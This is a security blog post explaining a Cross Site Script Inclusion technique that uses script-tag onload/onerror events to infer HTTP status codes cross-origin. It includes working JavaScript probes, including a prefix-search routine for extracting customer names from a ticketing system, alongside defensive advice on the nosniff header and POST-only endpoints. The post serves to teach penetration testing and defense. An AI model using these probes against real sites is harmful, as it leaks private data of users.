Attack and Defend: A new Cross Site Script Inclusion vector

This blog post may be of interest to the penetration testers out there. While playing with Cross Site Script Inclusion (XSSI) recently, Dennis realized something new about the attack. He describes the attack and then examines it from both the attacker's and the defender's perspective.

Introduction

While playing with Cross Site Script Inclusion (XSSI) recently, I realized the attack can be used to leak information, cross-origin, from HTTP status codes. If you're thinking "XSSI Login Oracle" then you're on the right track, but the attack can be expanded to more situations. Login oracles are usually JavaScript files that load or don't load depending on current authentication status. However, this attack can be done on HTML, JSON, XML, or just about any content type. This dramatically opens up the attack surface of XSSI to enumerate information from GET parameters, one bit at a time.

I haven't seen this specific attack published anywhere, so I'm going to attempt to make this post as comprehensive as possible. Edit: domnul_anonim on Reddit pointed out that Mike Cardwell published the same basic attack before it was called "XSSI". My blog post presents some new ideas about the attack, but referring to it as “new” is a bit bold and isn't quite appropriate.

I've also structured this paper for easy reference. The structure is as follows:

  1. Attack
  2. Attack Requirements
  3. Defense
  4. Further study
  5. Summary

TLDR Attack: Read "A More Interesting Example" in the Attack section below for a walkthrough. TLDR Defense: Use the nosniff HTTP header ("Requirement 1" explained in Defense section below).

I won't explain the basics of XSSI because I lack the room. SCIP has a blog post explaining XSSI in great depth. I consider it the best reference and introduction on the subject. I'm presenting an attack on non-script content injection. Stronger attacks on non-script content are explained in the cited blog but the attacks tend to require more specialized circumstances (encoding and injection tricks) than the one I will be demonstrating.

1.) The Attack

The basic idea is very similar to an XSSI login oracle. An attacker attempts to load script tags into his page that point at a different origin. By handling the onerror, onload, and window.onerror functions, an attacker can learn information about how the cross-origin server responded to the GET request. I was surprised to learn that onerror executes if you receive a non-2XX response, and onload executes otherwise. This is regardless of the content type returned, unless strict content type is being enforced (see Requirement 1).

So what's the big deal? What can you learn from a 200 vs a 400 response? Well, it depends on the endpoint, but potentially a lot. After all, the HTTP status code is meant to return information, and often does for APIs.

Some Basic Examples

Imagine an /admin directory that returns a 200 status code and HTML if you're authenticated, and a 401 with an HTML error page if you aren't. This would act not only as a login oracle, but it would also allow the enumeration of privileges. If there were a unique profile page for each user (e.g. /profile/dennis) then a similar attack could be used by a malicious site to identify specific users for further attacks and play innocent to response teams. If a page has SQL injection in a GET request but cannot be reached by the attacker, the attacker can cause authenticated users visiting an attacker-controlled page to bit-bang the injection for the attacker and leak the results cross-origin to the attacker's JavaScript.
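As a rough sketch of the /admin example, the helper below loads a cross-origin URL in a script tag and reports which handler fired. The name `probeStatus`, the `doc` parameter (there only so the DOM can be stubbed), and the victim.example URL are all hypothetical and not part of any real API.

```javascript
// Hypothetical helper: turn a cross-origin GET into a yes/no answer.
// `doc` defaults to the browser's document; it is a parameter only so
// that the DOM can be replaced with a stub.
function probeStatus(url, callback, doc) {
  doc = doc || document;
  var s = doc.createElement('script');
  s.onload = function () { callback(true); };   // server answered 2XX
  s.onerror = function () { callback(false); }; // non-2XX, or load blocked
  s.src = url;
  doc.head.appendChild(s); // the GET request is sent once this is attached
}

// Usage in a browser (assumed URL):
// probeStatus('https://victim.example/admin', function (ok) {
//   console.log(ok ? 'visitor has an admin session' : 'visitor is not an admin');
// });
```

The same helper pointed at a per-user profile URL would answer "is this visitor that user?" in the same way.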

A More Interesting Example

Let’s walk through a more interesting example in greater detail. Imagine a ticketing system that has a search field which is used to look up customer information. Sending a GET to "/search?c=d*", where the “*” character is acting as a wildcard, will return all the customers that start with the letter "d" and a 200 status code. If no customers match the “d*” pattern, then a 500 is returned. An attacker wants this information, but can’t log in and just look. So instead he asks an already logged-in user to make requests on the attacker’s behalf and tell the onload function “yes, I found someone” or tell the onerror function “no, that search returned nothing”.

It’s similar to exploiting a blind SQL injection except it’s through a third party and you're abusing Same-Origin Policy instead of syntax. Notice, the content type returned in the body by the ticketing system does not need to be assumed here. The search can return JSON, XML, HTML or even an image, it's all the same to this attack as long as the nosniff header isn't being returned (Requirement 1 in defense). URL parameters can be included in the script src attribute so an attacker can create a script like so:

	// victim_domain is a placeholder for the ticketing system's origin
	var d = document.createElement('script');
	d.src = victim_domain + "/search?c=a*";

This will send a GET request to the “/search?c=a*” API on the ticketing system. Now the attacker just sets the onload and onerror events to log success and failure respectively:

	d.onload  = function(){client_exists("a*")};
	d.onerror = function(){client_does_not_exist("a*")};

Then append it to the DOM:

	document.head.appendChild(d);

Any visitor to the attacker's site will then automatically send a GET request to the ticketing system, cross-origin. If there's a customer that starts with "a", then the endpoint will return a 200 and the onload will execute. The attacker's onload handler would then load another script into the DOM asking if there are any customers that start with "aa". If the onerror event occurs, it's because there were no customers that started with the letter "a", so the attacker would then load another script into the DOM checking for customers who start with the letter "b". The script would continue with a tree searching algorithm until a valid customer name was returned.
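The tree search described above could look something like the sketch below. It is only an illustration: `findName`, `ALPHABET`, and `maxLen` are made-up names, the alphabet is assumed to be lowercase letters, and `probe(pattern, cb)` is assumed to be a function that loads the search URL for `pattern` in a script tag and calls `cb(true)` from onload or `cb(false)` from onerror.

```javascript
// Hypothetical depth-first prefix search; returns the first name it can spell.
var ALPHABET = 'abcdefghijklmnopqrstuvwxyz'; // assumed character set

function findName(probe, prefix, maxLen, done) {
  var i = 0;
  function tryNext() {
    if (prefix.length >= maxLen || i >= ALPHABET.length) {
      // Length cap reached, or no letter extends this prefix: report it.
      return done(prefix);
    }
    var candidate = prefix + ALPHABET[i++];
    probe(candidate + '*', function (found) {
      if (found) {
        findName(probe, candidate, maxLen, done); // "a*" matched, try "aa*"
      } else {
        tryNext();                                // "a*" failed, try "b*"
      }
    });
  }
  tryNext();
}

// Usage (probe is whatever wraps the script tag technique shown earlier):
// findName(probe, '', 32, function (name) { console.log('found', name); });
```

An empty result means no pattern matched at all, which is also what the attacker would see for a visitor with no access to the search.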

Once a customer name is discovered, the same type of attack can be used to search other API endpoints that require a customer name and return other information. For example, an endpoint that searches for email addresses associated with a customer. The attacker could also search for customers matching the "*" pattern. If this fails, it means the visitor doesn't have access to the ticketing system customer search and no further requests need to be made. Because the information-stealing requests are being performed by visitors to the attacker's site, the attack can be parallelized across all visitors. Put all this together with a social engineering email and there is potential for a lot of information leakage from even an internal ticketing system.

2.) Attack Requirements

To put it simply, the following elements are required:

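  1. The 'X-Content-Type-Options: nosniff' HTTP header is not being returned, unless the content type is JavaScript.
  2. The endpoint must respond to a GET request.
  3. The endpoint's HTTP status code must vary with the information being sought (for example, 2XX on success and non-2XX on failure).
  4. The attacker cannot simply retrieve the information himself, but a visitor to the attacker's page can.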

The most concerning thing is what is not said here. There is no mention of content type, other than JavaScript in requirement 1. So, this attack works on XML, JSON, images, or any other content (so far as I have seen). (See Note 2 in "Requirement 1" below for details). More details on the requirements follow in the defense section. Pentesters: you should read that section too, because it explains some more tricks in greater depth.

3.) The Defense

You just have to disturb one of the above requirements. Let's go through the requirements in greater detail from a defensive perspective.

Requirement 1

If the ‘X-Content-Type-Options: nosniff’ HTTP header is returned, this attack won’t work. This is the simplest to verify and to implement. If you want to fix your site this is probably the way to do it. The nosniff header is a way the server can tell a browser "When I say I am giving you <Content-Type> I mean it is really <Content-Type>!".

Why does this work? All types of files are served over HTTP, and web developers aren't always good about declaring the file type properly. So when a browser requests a JavaScript file, the content-type header may declare it's actually HTML. A browser thus puts off producing an error until it tries to parse the file as JavaScript. At that point, onload has already executed and any parsing errors will call the window.onerror function. The existence of the nosniff header means onerror will always be called immediately if the content type isn't stated correctly. Always onerror means no measurable difference and no information loss. If the content type is JavaScript, nosniff doesn't help and you have a normal XSSI attack.
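For illustration only, here is roughly what returning the header looks like in a plain Node.js request handler. The handler name `searchHandler`, the JSON payload, and the port in the usage comment are assumptions made for the sketch; any server or framework that lets you set response headers can do the same thing.

```javascript
// Hypothetical Node.js request handler; route and payload are assumptions.
function searchHandler(req, res) {
  // Ask the browser to honor the declared type instead of sniffing.
  res.setHeader('X-Content-Type-Options', 'nosniff');
  // Declare the real type, so a script tag pointed here is refused.
  res.setHeader('Content-Type', 'application/json; charset=utf-8');
  res.statusCode = 200;
  res.end(JSON.stringify({ customers: [] }));
}

// Usage with Node's built-in http module:
// require('http').createServer(searchHandler).listen(8080);
```

In practice the header is usually set once, globally, in the web server or a middleware layer, so that error responses carry it too.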

Note: This is only true for browsers that respect the nosniff header. IE and Chrome were the first to support this header. Firefox has followed. I don’t know exactly when support started, but I have found that Firefox 51 honors nosniff while Firefox 45.5 does not. I assume Edge will act the same as IE, but I haven't personally tested either of them. Edit: 1lastBr3ath from Reddit pointed out that Safari doesn't support the nosniff header, while Edge does. He also corrected my mistake: it is Firefox 51, not 50, that added support for nosniff.

Note 2: On the topic of which content types work, 1lastBr3ath from Reddit pointed me to this documentation, which is really where I should've pointed to.

It states:

"The script should be served with the text/javascript MIME type, but browsers are lenient and only block them if the script is served with an image type (image/*), a video type (video/*), an audio (audio/*) type, or text/csv. If the script is blocked, an error is sent to the element, if not a success event is sent."

So not every content type will work in script tags. However, typical informational content types, like XML or JSON, will. This restriction can potentially be bypassed by just using a different tag (See Further Study: other tags).

Requirement 2

Script tags only work with GET requests. So if your endpoint only accepts POST requests, then this attack can’t be performed. This requirement is seemingly simple, but be careful. You may have designed your API to accept POST requests but your content management system may accept GET requests all the same.
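One way to make sure a stray GET never reaches the sensitive handler is to check the method explicitly. The wrapper below is a minimal sketch for a Node.js style handler; the name `postOnly` is made up, and real frameworks usually offer their own way to restrict methods.

```javascript
// Hypothetical wrapper: only let POST requests through to `handler`.
function postOnly(handler) {
  return function (req, res) {
    if (req.method !== 'POST') {
      // Same answer for every non-POST request, so nothing leaks.
      res.statusCode = 405;
      res.setHeader('Allow', 'POST');
      res.end();
      return;
    }
    handler(req, res);
  };
}

// Usage with Node's built-in http module (searchHandler is assumed to exist):
// require('http').createServer(postOnly(searchHandler)).listen(8080);
```

Because every GET gets the same 405, a script tag pointed at the endpoint always ends in onerror, whatever the query was.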

Requirement 3

If the endpoint always returns a 200, then there is no information within the status code to steal. However, status codes exist for a reason! Don’t just go abandoning a core part of the HTTP protocol just to stop this attack. Use the nosniff header instead.

Constant HTTP status codes do stop the particular attack described here, but other attacks may still be possible. For example, a top level JSON array can be parsed as JavaScript while a top level JSON object can not. So even though your endpoint always returns 200 status codes, information can be gathered from whether or not there is a parsing error by creating a window.onerror function. Applying the nosniff header will stop even this attack as long as the Content-Type header is appropriately set to JSON.
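The array versus object difference is easy to check outside a browser. The sketch below uses `new Function`, which compiles its argument without running it, as a stand-in for what a script tag's parser would do. The helper name `parsesAsScript` is made up, and a function body is not parsed in exactly the same way as a script file, but for these two inputs the outcome is the same.

```javascript
// Hypothetical check: does this response body compile as JavaScript?
function parsesAsScript(source) {
  try {
    new Function(source); // compiles the text, never executes it
    return true;
  } catch (e) {
    if (e instanceof SyntaxError) return false;
    throw e; // anything else is unexpected, so pass it on
  }
}

console.log(parsesAsScript('[1, 2, 3]')); // true: an array literal is a valid statement
console.log(parsesAsScript('{"a": 1}'));  // false: read as a block, then ":" is a syntax error
```

In the browser, the second case is what ends up calling window.onerror, which is the signal the attacker watches for.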

Requirement 4

If an attacker is in a position to just load up the secret information in his own browser, then there is no need for this attack. This attack revolves around an attacker domain asking a visitor to use their privileged position to get more information. Privileged position will most commonly mean authenticated, but could also mean network position. If your home router has this vulnerability, malicious public sites can request scripts from it and leak information.

4.) Further Study

3XX codes:

I have given little attention to open redirects and 3XX responses, which could expand the attack further. So far it does appear redirecting to a 2XX acts like a 2XX and redirecting to a non-2XX acts like a non-2XX. This means an endpoint protecting itself by checking the referer header might be bypassed if an open redirect is discovered. This is a neat idea too.

Other tags:

I believe img tags pointing cross-origin behave similarly to script tags. Maybe loading a resource in both img and script tags could lead to more information disclosure due to parsing differences. CSS may also deserve a look.

Other Attributes

I was hoping Subresource Integrity would yield further information leaks, but it wisely requires CORS to work. If you can get around CORS then there are bigger problems than this attack.

I have spent most of my time testing onload, onerror, and window.onerror to get information. Observing more attributes may yield other attacks or more information per request.

5.) In Summary

Any detectable difference in loading a cross origin resource is information. That information may be as minor as a login oracle, but could potentially be as bad as credentials (though unlikely).

Defenders: A misunderstanding of content type is a common vector for all sorts of attacks. Enforcing strict content type with the nosniff HTTP header will mitigate this and many more attacks. It also puts you in a failsafe position. A response with improper content will cause an error that will be obvious to anyone and fixed easily.

Attackers: Same-origin policy is a little-understood concept, which makes it a great source of bugs. Look for sensitive information returned in GET requests. Then see if you can detect any difference in behavior when requesting that information cross-origin via script tags.


